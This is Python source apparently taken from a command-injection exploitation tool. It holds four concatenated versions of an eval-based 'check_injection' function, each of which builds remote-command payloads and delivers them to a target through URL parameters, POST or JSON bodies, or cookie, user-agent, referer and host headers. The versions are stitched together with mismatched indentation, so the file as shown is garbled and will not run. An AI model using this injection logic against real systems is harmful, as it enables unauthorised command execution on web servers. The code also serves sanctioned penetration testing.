def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename):
  """Send a single eval-based injection request and return the response.

  Steps, in order:
    1. build the command payload with ``eb_payloads`` (``alter_shell`` picks
       the alternative-shell variant);
    2. wrap it with ``prefix`` / ``suffix`` via ``parameters``;
    3. apply the one known payload fixation (see the comment below);
    4. encode for transport: the whole payload is base64-encoded when
       ``menu.options.base64`` is set, otherwise spaces become ``%20``;
    5. place it where ``settings.INJECT_TAG`` occurs - cookie, user-agent or
       referer header (delegated to the matching ``*_injection_test``
       helper), else the URL for GET or ``menu.options.data`` for POST.

  Args:
    separator, TAG, cmd: forwarded unchanged to the payload builder.
    prefix, suffix: forwarded to ``parameters.prefixes`` / ``suffixes``.
    http_request_method: ``"GET"`` selects URL substitution; any other value
      is handled as POST.
    url, vuln_parameter: request target and the parameter under test; both
      are passed through to the header helpers unchanged.
    alter_shell: truthy selects ``cmd_execution_alter_shell``.
    filename: accepted for signature compatibility; not referenced here.

  Returns:
    Whatever ``get_request_response`` (GET/POST path) or the header helper
    that handled the request returns.
  """
  # Step 1: base payload.
  if alter_shell:
    build_payload = eb_payloads.cmd_execution_alter_shell
  else:
    build_payload = eb_payloads.cmd_execution
  payload = build_payload(separator, TAG, cmd)

  # Step 2: prefix / suffix wrapping.
  payload = parameters.suffixes(parameters.prefixes(payload, prefix), suffix)

  # Step 3: fixation for one specific payload shape - an encoded ';' that
  # directly precedes the percent-encoded ')}' closer is dropped.
  quoted_closer = urllib.quote(")}")
  broken_tail = ")%3B" + quoted_closer
  if broken_tail in payload:
    payload = payload.replace(broken_tail, ")" + quoted_closer)

  # Step 4: transport encoding.
  if menu.options.base64:
    payload = base64.b64encode(urllib.unquote(payload))
  else:
    payload = payload.replace(" ", "%20")

  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)

  # Step 5a: header injection points, checked in this fixed priority order.
  # The first header that carries the INJECT_TAG marker handles the request.
  header_tests = (
    (menu.options.cookie, cookie_injection_test),
    (menu.options.agent, user_agent_injection_test),
    (menu.options.referer, referer_injection_test),
  )
  for header_value, run_test in header_tests:
    if header_value and settings.INJECT_TAG in header_value:
      return run_test(url, vuln_parameter, payload)

  # Step 5b: URL (GET) or request body (POST).
  if http_request_method == "GET":
    # NOTE: re.sub is kept as upstream wrote it - INJECT_TAG acts as a regex
    # pattern and payload as a replacement template, not as plain text.
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)  # kept from upstream; the result is not used afterwards
    request = urllib2.Request(target)
  else:
    parameter = parameters.do_POST_check(urllib2.unquote(menu.options.data))
    if settings.IS_JSON == False:
      request = urllib2.Request(url, re.sub(settings.INJECT_TAG, payload, parameter))
    else:
      # JSON body: escape double quotes so the substituted value stays a valid
      # JSON string, then round-trip through json to re-serialise the body.
      escaped = payload.replace("\"", "\\\"")
      body = re.sub(settings.INJECT_TAG, urllib.unquote(escaped), parameter)
      request = urllib2.Request(url, json.dumps(json.loads(body, strict = False)))

  # Extra headers, then send the request.
  headers.do_check(request)
  return get_request_response(request)
  def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
    """Send a single eval-based injection request and return the response.

    Flow: build the payload with ``eb_payloads`` (``alter_shell`` selects the
    alternative-shell variant), wrap it with ``prefix`` / ``suffix``, apply the
    known payload fixation, replace every space with ``whitespace``, optionally
    base64-encode it through the tamper script, then place it where
    ``settings.INJECT_TAG`` occurs: cookie, user-agent, referer or custom
    header (delegated to the matching ``*_injection_test`` helper), else the
    URL for GET or ``menu.options.data`` for POST.

    Args:
      separator, TAG, cmd: forwarded unchanged to the payload builder.
      prefix, suffix: forwarded to ``parameters.prefixes`` / ``suffixes``.
      whitespace: substitute written in place of each space in the payload.
      http_request_method: ``"GET"`` selects URL substitution; any other
        value is handled as POST.
      url, vuln_parameter: request target and the parameter under test; both
        are passed through to the header helpers unchanged.
      alter_shell: truthy selects ``cmd_execution_alter_shell``.
      filename: accepted for signature compatibility; not referenced here.

    Returns:
      Whatever ``requests.get_request_response`` or the header helper that
      handled the request returns.
    """
    # Base payload, wrapped with prefix / suffix.
    if alter_shell:
      build_payload = eb_payloads.cmd_execution_alter_shell
    else:
      build_payload = eb_payloads.cmd_execution
    payload = build_payload(separator, TAG, cmd)
    payload = parameters.suffixes(parameters.prefixes(payload, prefix), suffix)

    # Fixation for one specific payload shape - an encoded ';' that directly
    # precedes the percent-encoded ')}' closer is dropped.
    quoted_closer = urllib.quote(")}")
    broken_tail = ")%3B" + quoted_closer
    if broken_tail in payload:
      payload = payload.replace(broken_tail, ")" + quoted_closer)

    # Whitespace fixation. re.sub is kept as upstream wrote it, so `whitespace`
    # is interpreted as a replacement template rather than plain text.
    payload = re.sub(" ", whitespace, payload)

    # Optional tamper script: base64-encode the whole payload.
    if settings.TAMPER_SCRIPTS['base64encode']:
      from src.core.tamper import base64encode
      payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Executing the '" + cmd + "' command: "
      sys.stdout.write("\n" + settings.print_info_msg(info_msg))
      sys.stdout.flush()
      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Header injection points, checked in this fixed priority order; the first
    # header carrying the INJECT_TAG marker handles the request.
    header_tests = (
      (menu.options.cookie, cookie_injection_test),
      (menu.options.agent, user_agent_injection_test),
      (menu.options.referer, referer_injection_test),
    )
    for header_value, run_test in header_tests:
      if header_value and settings.INJECT_TAG in header_value:
        return run_test(url, vuln_parameter, payload)
    if settings.CUSTOM_HEADER_INJECTION:
      return custom_header_injection_test(url, vuln_parameter, payload)

    # URL (GET) or request body (POST).
    if http_request_method == "GET":
      # NOTE: re.sub is kept as upstream wrote it - INJECT_TAG acts as a regex
      # pattern and payload as a replacement template.
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)  # kept from upstream; the result is not used afterwards
      request = urllib2.Request(target)
    else:
      parameter = parameters.do_POST_check(urllib2.unquote(menu.options.data))
      parameter = parameter.replace("+","%2B")
      if settings.IS_JSON == False:
        request = urllib2.Request(url, re.sub(settings.INJECT_TAG, payload, parameter))
      else:
        # JSON body: escape double quotes so the substituted value stays a
        # valid JSON string, then round-trip through json to re-serialise.
        escaped = payload.replace("\"", "\\\"")
        body = re.sub(settings.INJECT_TAG, urllib.unquote(escaped), parameter)
        request = urllib2.Request(url, json.dumps(json.loads(body, strict = False)))

    # Extra headers, then send the request.
    headers.do_check(request)
    return requests.get_request_response(request)
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        """Send a single eval-based injection request and return the response.

        Flow: build the payload with ``eb_payloads`` (``alter_shell`` selects
        the alternative-shell variant), wrap it with ``prefix`` / ``suffix``,
        apply the known payload fixation, replace every space with
        ``whitespace``, run ``checks.perform_payload_modification``, then place
        it where ``settings.INJECT_TAG`` occurs: cookie, user-agent, referer,
        host or custom header (delegated to the matching ``*_injection_test``
        helper), else the URL for GET or ``menu.options.data`` for POST.

        Args:
            separator, TAG, cmd: forwarded unchanged to the payload builder.
            prefix, suffix: forwarded to ``parameters.prefixes`` / ``suffixes``.
            whitespace: substitute written in place of each space in the
                payload.
            http_request_method: ``"GET"`` selects URL substitution; any other
                value is handled as POST.
            url, vuln_parameter: request target and the parameter under test;
                both are passed through to the header helpers unchanged.
            alter_shell: truthy selects ``cmd_execution_alter_shell``.
            filename: accepted for signature compatibility; not referenced
                here.

        Returns:
            Whatever ``requests.get_request_response`` or the header helper
            that handled the request returns.
        """
        # Base payload, wrapped with prefix / suffix.
        if alter_shell:
            build_payload = eb_payloads.cmd_execution_alter_shell
        else:
            build_payload = eb_payloads.cmd_execution
        payload = build_payload(separator, TAG, cmd)
        payload = parameters.suffixes(parameters.prefixes(payload, prefix), suffix)

        # Fixation for one specific payload shape - an encoded ';' that
        # directly precedes the percent-encoded ')}' closer is dropped.
        quoted_closer = _urllib.parse.quote(")}")
        broken_tail = ")%3B" + quoted_closer
        if broken_tail in payload:
            payload = payload.replace(broken_tail, ")" + quoted_closer)

        # Whitespace fixation, then the project-wide payload modification hook.
        payload = payload.replace(" ", whitespace)
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            debug_msg = "Executing the '" + cmd + "' command. "
            sys.stdout.write(settings.print_debug_msg(debug_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Header injection points, checked in this fixed priority order; the
        # first header carrying the INJECT_TAG marker handles the request.
        header_tests = (
            (menu.options.cookie, cookie_injection_test),
            (menu.options.agent, user_agent_injection_test),
            (menu.options.referer, referer_injection_test),
            (menu.options.host, host_injection_test),
        )
        for header_value, run_test in header_tests:
            if header_value and settings.INJECT_TAG in header_value:
                return run_test(url, vuln_parameter, payload)
        if settings.CUSTOM_HEADER_INJECTION:
            return custom_header_injection_test(url, vuln_parameter, payload)

        # URL (GET) or request body (POST).
        if http_request_method == "GET":
            target = url.replace(settings.INJECT_TAG, payload)
            vuln_parameter = ''.join(vuln_parameter)  # kept from upstream; the result is not used afterwards
            request = _urllib.request.Request(target)
        else:
            parameter = parameters.do_POST_check(_urllib.parse.unquote(menu.options.data))
            parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")

            # Body substitution depends on the declared content shape.
            if settings.IS_JSON:
                # Escape double quotes so the substituted value stays a valid
                # JSON string.
                json_safe = _urllib.parse.unquote(payload.replace("\"", "\\\""))
                data = parameter.replace(settings.INJECT_TAG, json_safe)
                try:
                    data = checks.json_data(data)
                except ValueError:
                    # Upstream best-effort: on a parse failure the raw
                    # substituted string is sent unchanged.
                    pass
            elif settings.IS_XML:
                data = parameter.replace(settings.INJECT_TAG,
                                         _urllib.parse.unquote(payload))
            else:
                data = parameter.replace(settings.INJECT_TAG, payload)
            request = _urllib.request.Request(
                url, data.encode(settings.UNICODE_ENCODING))

        # Extra headers, then send the request.
        headers.do_check(request)
        return requests.get_request_response(request)
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        """Send a single eval-based injection request and return the response.

        Flow: build the payload with ``eb_payloads`` (``alter_shell`` selects
        the alternative-shell variant), wrap it with ``prefix`` / ``suffix``,
        apply the known payload fixation, replace every space with
        ``whitespace``, optionally run one tamper script (base64 or hex), then
        place it where ``settings.INJECT_TAG`` occurs: cookie, user-agent,
        referer or custom header (delegated to the matching
        ``*_injection_test`` helper), else the URL for GET or
        ``menu.options.data`` for POST.

        Args:
            separator, TAG, cmd: forwarded unchanged to the payload builder.
            prefix, suffix: forwarded to ``parameters.prefixes`` / ``suffixes``.
            whitespace: substitute written in place of each space in the
                payload.
            http_request_method: ``"GET"`` selects URL substitution; any other
                value is handled as POST.
            url, vuln_parameter: request target and the parameter under test;
                both are passed through to the header helpers unchanged.
            alter_shell: truthy selects ``cmd_execution_alter_shell``.
            filename: accepted for signature compatibility; not referenced
                here.

        Returns:
            Whatever ``requests.get_request_response`` or the header helper
            that handled the request returns.
        """
        # Base payload, wrapped with prefix / suffix.
        if alter_shell:
            build_payload = eb_payloads.cmd_execution_alter_shell
        else:
            build_payload = eb_payloads.cmd_execution
        payload = build_payload(separator, TAG, cmd)
        payload = parameters.suffixes(parameters.prefixes(payload, prefix), suffix)

        # Fixation for one specific payload shape - an encoded ';' that
        # directly precedes the percent-encoded ')}' closer is dropped.
        quoted_closer = urllib.quote(")}")
        broken_tail = ")%3B" + quoted_closer
        if broken_tail in payload:
            payload = payload.replace(broken_tail, ")" + quoted_closer)

        # Whitespace fixation. re.sub is kept as upstream wrote it, so
        # `whitespace` is interpreted as a replacement template.
        payload = re.sub(" ", whitespace, payload)

        # Tamper scripts: at most one applies, base64 taking precedence.
        if settings.TAMPER_SCRIPTS['base64encode']:
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)
        elif settings.TAMPER_SCRIPTS['hexencode']:
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload))
            # Trailing line break is suppressed when sessions are ignored.
            if not menu.options.ignore_session:
                print ""

        # Header injection points, checked in this fixed priority order; the
        # first header carrying the INJECT_TAG marker handles the request.
        header_tests = (
            (menu.options.cookie, cookie_injection_test),
            (menu.options.agent, user_agent_injection_test),
            (menu.options.referer, referer_injection_test),
        )
        for header_value, run_test in header_tests:
            if header_value and settings.INJECT_TAG in header_value:
                return run_test(url, vuln_parameter, payload)
        if settings.CUSTOM_HEADER_INJECTION:
            return custom_header_injection_test(url, vuln_parameter, payload)

        # URL (GET) or request body (POST).
        if http_request_method == "GET":
            # NOTE: re.sub is kept as upstream wrote it - INJECT_TAG acts as a
            # regex pattern and payload as a replacement template.
            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)  # kept from upstream; the result is not used afterwards
            request = urllib2.Request(target)
        else:
            parameter = parameters.do_POST_check(urllib2.unquote(menu.options.data))
            parameter = parameter.replace("+", "%2B")
            if settings.IS_JSON == False:
                request = urllib2.Request(
                    url, re.sub(settings.INJECT_TAG, payload, parameter))
            else:
                # JSON body: escape double quotes so the substituted value
                # stays a valid JSON string, then round-trip through json.
                escaped = payload.replace("\"", "\\\"")
                body = re.sub(settings.INJECT_TAG, urllib.unquote(escaped),
                              parameter)
                request = urllib2.Request(
                    url, json.dumps(json.loads(body, strict=False)))

        # Extra headers, then send the request.
        headers.do_check(request)
        return requests.get_request_response(request)